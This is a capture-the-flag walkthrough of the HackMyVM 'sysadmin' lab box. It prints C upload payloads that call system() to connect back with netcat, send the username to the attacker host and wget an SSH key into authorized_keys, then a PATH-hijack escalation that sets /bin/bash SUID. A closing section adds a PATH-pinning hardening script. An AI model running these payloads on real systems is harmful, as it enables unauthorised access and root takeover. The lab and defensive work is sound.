[Box Diary] HMV: sysadmin
Preface and tools
Attacker machine: 192.168.56.247
Target machine: 192.168.56.210
Tools:
- arp-scan
- nmap
- curl
- nc
Information gathering
Host discovery
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:d2:97:44, IPv4: 192.168.56.247
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.56.100 08:00:27:c6:2f:5e PCS Systemtechnik GmbH
192.168.56.210 08:00:27:22:3d:b7 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 4.731 seconds (54.11 hosts/sec). 3 responded
Port scanning
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# nmap 192.168.56.210 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-31 07:15 EDT
Nmap scan report for 192.168.56.210
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:22:3D:B7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 26.75 seconds
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# curl 192.168.56.210
<!doctype html>
<html lang="en">
<head><meta charset="utf-8"><title>C Code Upload</title><meta name="viewport" content="width=device-width,initial-scale=1"><style>/* ---------- RESET ---------- */*{box-sizing:border-box;margin:0;padding:0}body{font-family:Arial,Helvetica,sans-serif;color:#333;padding:30px;background:#fff}/* ---------- CARD ---------- */.card{max-width:420px;margin:0 auto;border:1px solid #ccc;border-radius:8px;padding:25px 30px;box-shadow:0 2px 6px rgba(0,0,0,.1);text-align:center;}.card h1{font-size:24px;margin-bottom:8px}.card p.sub{font-size:14px;color:#666;margin-bottom:20px}/* ---------- ALERT ---------- */.alert{padding:10px 12px;border-radius:6px;font-size:14px;margin-bottom:20px;text-align:left}.alert.success{background:#e7f7ed;color:#0e5132;border-left:4px solid #28a745}.alert.error{background:#fce7e7;color:#721c24;border-left:4px solid #dc3545}.alert.warn{background:#fff3cd;color:#856404;border-left:4px solid #ffc107}/* ---------- FORM ---------- */form input[type=file]{width:100%;margin-bottom:15px;padding:8px;border:1px solid #bbb;border-radius:4px}form input[type=submit]{width:100%;padding:10px;background:#1976d2;color:#fff;border:0;border-radius:4px;cursor:pointer}form input[type=submit]:hover{background:#125a9c}/* ---------- FOOTER ---------- */.footer{margin-top:20px;font-size:12px;color:#888}</style>
</head>
<body><!-- main card --><div class="card"><h1>C Code Upload Platform</h1><p class="sub">Upload your <code>.c</code> file to compile and run.</p><!-- PHP upload handler --><!-- upload form --><form action="" method="post" enctype="multipart/form-data"><input type="file" name="src" accept=".c" required><input type="submit" value="Upload & Compile"></form><div class="footer"><b>Notice:</b> Your compiled binary will be deleted immediately after execution.</div></div><!--gcc -std=c11 -nostdinc -I/var/www/include -z execstack -fno-stack-protector -no-pie test.c -o a.out-->
</body>
</html>
Summary of findings
- Host address: 192.168.56.210
- Open ports: 22/ssh, 80/http
- Port 80:
  - Accepts an uploaded C file, compiles and executes it, and deletes the binary after execution
  - Compile command: gcc -std=c11 -nostdinc -I/var/www/include -z execstack -fno-stack-protector -no-pie test.c -o a.out
    - -std=c11: compile against the C11 standard
    - -nostdinc: do not search the standard system header directories
    - -I/var/www/include: add /var/www/include as a header search directory
    - -z execstack: mark the stack executable (disables the non-executable-stack protection)
    - -fno-stack-protector: disable the stack protector (no canary-based buffer-overflow detection)
    - -no-pie: do not produce a position-independent executable
    - test.c: the source file
    - -o a.out: name the output executable a.out
Exploitation (file upload)
Task: get a shell without using the standard headers
First, try declaring system directly and see whether it runs
//try.c
int system(const char *command); // declare system without going through <stdlib.h>
int main() {
    system("busybox nc 192.168.56.247 9427");
    return 0;
}
# sending terminal
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# curl -X POST -F "src=@try.c" http://192.168.56.210:80
(...)
# listening terminal
┌──(root㉿kali)-[~]
└─# nc -lvp 9427
listening on [any] 9427 ...
192.168.56.210: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.247] from (UNKNOWN) [192.168.56.210] 36106
The target compiled and ran the file, then connected back to port 9427.
A reverse shell is awkward with the headers unavailable, so switch to writing an SSH public key instead.
① Find the current username
//revname.c
int system(const char *command);
int main() {
    system("echo $(whoami) | busybox nc 192.168.56.247 80");
    return 0;
}
# sending terminal
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# curl -X POST -F "src=@revname.c" http://192.168.56.210:80
(...)
# listening terminal
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.210 - - [31/Oct/2025 08:20:01] code 400, message Bad request syntax ('echo')
192.168.56.210 - - [31/Oct/2025 08:20:01] "echo" 400 -
The callback shows that the current user is **echo**
② Write the attacker's SSH public key into the echo user's .ssh/authorized_keys
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# cat ~/.ssh/id_rsa.pub > ./authorized_keys
Place the public key in the directory served by the Python HTTP server
//putkey.c
int system(const char *command);
int main() {
    system("mkdir -p ~/.ssh && busybox wget 192.168.56.247/authorized_keys -O ~/.ssh/authorized_keys");
    return 0;
}
# sending terminal
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# curl -X POST -F "src=@putkey.c" http://192.168.56.210:80
# listening terminal
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.210 - - [31/Oct/2025 08:20:01] code 400, message Bad request syntax ('echo')
192.168.56.210 - - [31/Oct/2025 08:20:01] "echo" 400 -
192.168.56.210 - - [31/Oct/2025 08:29:01] "GET /authorized_keys HTTP/1.1" 200 -
The server logs "GET /authorized_keys HTTP/1.1" 200 -, so the attacker's SSH public key was written to the target.
③ Log in to the target as the echo user with the key
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# ssh echo@192.168.56.210
Linux Sysadmin 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
echo@Sysadmin:~$ ls
user.txt
echo@Sysadmin:~$
Got a shell as user echo.
Privilege escalation
Check id and sudo -l for anything usable
echo@Sysadmin:~$ id
uid=1000(echo) gid=1000(echo) groups=1000(echo)
echo@Sysadmin:~$ sudo -l
Matching Defaults entries for echo on Sysadmin:
    !env_reset, mail_badpass, !env_reset, always_set_home

User echo may run the following commands on Sysadmin:
    (root) NOPASSWD: /usr/local/bin/system-info.sh
- !env_reset: the environment is not reset, so the caller's PATH is inherited and commands called by bare name can be hijacked
- (root) NOPASSWD: /usr/local/bin/system-info.sh: system-info.sh can be run as root without a password
Look at system-info.sh for commands that can be hijacked
echo@Sysadmin:~$ cat /usr/local/bin/system-info.sh
#!/bin/bash
#===================================
# Daily System Info Report
#===================================
echo "Starting daily system information collection at $(date)"
echo "------------------------------------------------------"
echo "Checking disk usage..."
df -h
echo "Checking log directory..."
ls -lh /var/log/
find /var/log/ -type f -name "*.gz" -mtime +30 -exec rm {} \;
echo "Checking critical services..."
systemctl is-active sshd
systemctl is-active cron
echo "Collecting CPU and memory information..."
cat /proc/cpuinfo
free -m
echo "------------------------------------------------------"
echo "Report complete at $(date)"
- df (real path: /bin/df)
- ls (real path: /bin/ls)
- find (real path: /usr/bin/find)
- systemctl (real path: /bin/systemctl)
- cat (real path: /bin/cat)
- free (real path: /usr/bin/free)
Several commands are called by bare name and can be hijacked; the first one executed, df, serves as the example.
echo@Sysadmin:~$ echo '#!/bin/bash' > /tmp/df # declare bash as the interpreter
echo@Sysadmin:~$ echo 'chmod +s /bin/bash' >> /tmp/df # append the malicious command to /tmp/df
echo@Sysadmin:~$ chmod +x /tmp/df # make /tmp/df executable
echo@Sysadmin:~$ export PATH="/tmp:$PATH" # put /tmp at the front of PATH so it is searched before the system directories
echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh
(...)
echo@Sysadmin:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
The malicious code ran as root.
echo@Sysadmin:~$ bash -p
bash-5.0# id
uid=1000(echo) gid=1000(echo) euid=0(root) egid=0(root) groups=0(root),1000(echo)
bash-5.0# cd /root
bash-5.0# ls
root.txt
Privilege escalation succeeded: root shell obtained.
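The two findings behind this escalation are the !env_reset sudoers default, which lets the caller's PATH reach the root context, and a root-run script that calls df, ls, find, systemctl, cat and free by bare name. The script below is an added example, not the box's own system-info.sh: it shows the fix on the script side (pin PATH before anything runs and refuse to continue if a required tool resolves outside the trusted directories) and carries the sudoers-side fix in a comment. It assumes the real tools live under /bin, /usr/bin, /sbin or /usr/sbin; the throw-away directory and the fake "ls" in the self-check are constructed for the demonstration only.

```shell
#!/bin/sh
# Added example (not the box's own script): a PATH-hijack-resistant rewrite of
# the system-info report, with a self-check that shows why the original could be
# hijacked. Assumes the real tools live under /bin, /usr/bin, /sbin or /usr/sbin;
# the throw-away directory and the fake "ls" are constructed for the check only.
#
# The sudoers side of the fix (the box had "!env_reset", so the caller's PATH
# reached the root context) is to restore the defaults, for example:
#   Defaults env_reset
#   Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
set -u

# Directories a root-run script should trust for its external commands.
SAFE_PATH="/usr/sbin:/usr/bin:/sbin:/bin"

# resolve_under PATHVALUE NAME: print the file NAME would execute as under
# PATHVALUE (empty if not found). The subshell keeps the PATH change and the
# shell's command hash from leaking into the caller.
resolve_under() {
    ( PATH="$1"; command -v "$2" 2>/dev/null ) || true
}

# is_trusted FILE: succeed only if FILE lies inside one of the SAFE_PATH dirs.
is_trusted() {
    case "$1" in
        /usr/sbin/*|/usr/bin/*|/sbin/*|/bin/*) return 0 ;;
        *) return 1 ;;
    esac
}

# verify_tools NAME...: fail if any tool is missing or resolves outside the
# trusted directories under the current PATH (call after PATH is pinned).
verify_tools() {
    for tool in "$@"; do
        resolved=$(command -v "$tool" 2>/dev/null) || resolved=""
        if [ -z "$resolved" ]; then
            echo "refusing to run: $tool not found" >&2
            return 1
        fi
        if ! is_trusted "$resolved"; then
            echo "refusing to run: $tool resolves to $resolved" >&2
            return 1
        fi
    done
}

# report: the hardened report body. PATH is pinned first, so whatever the
# invoking user exported (e.g. PATH="/tmp:$PATH") no longer matters here.
report() {
    PATH="$SAFE_PATH"
    export PATH
    verify_tools date df ls systemctl free || return 1
    echo "Starting daily system information collection at $(date)"
    echo "Checking disk usage..."
    df -h
    echo "Checking log directory..."
    ls -lh /var/log/
    echo "Checking critical services..."
    systemctl is-active sshd
    systemctl is-active cron
    echo "Collecting memory information..."
    free -m
    echo "Report complete at $(date)"
}

# hijack_check: build a throw-away directory holding a fake "ls", then compare
# how "ls" resolves under a caller-prepended PATH versus SAFE_PATH. Succeeds
# only when the fake wins under the inherited PATH and the pinned PATH still
# lands in a trusted directory, i.e. when pinning is what removes the hijack.
hijack_check() {
    fake_dir=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho fake\n' > "$fake_dir/ls"
    chmod +x "$fake_dir/ls"
    inherited=$(resolve_under "$fake_dir:$PATH" ls)
    pinned=$(resolve_under "$SAFE_PATH" ls)
    rm -rf "$fake_dir"
    [ "$inherited" = "$fake_dir/ls" ] || return 1
    is_trusted "$pinned" || return 1
    echo "inherited PATH -> $inherited"
    echo "pinned PATH    -> $pinned"
}

# Stand-alone use: "sh hardened-report.sh" runs the self-check;
# "sh hardened-report.sh report" runs the hardened report itself.
case "${1:-check}" in
    report) report ;;
    *) hijack_check ;;
esac
```

Pinning PATH inside the script is what neutralizes the export PATH="/tmp:$PATH" step used above; restoring env_reset and secure_path in sudoers removes the inherited environment at the source, so both belong in the fix.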
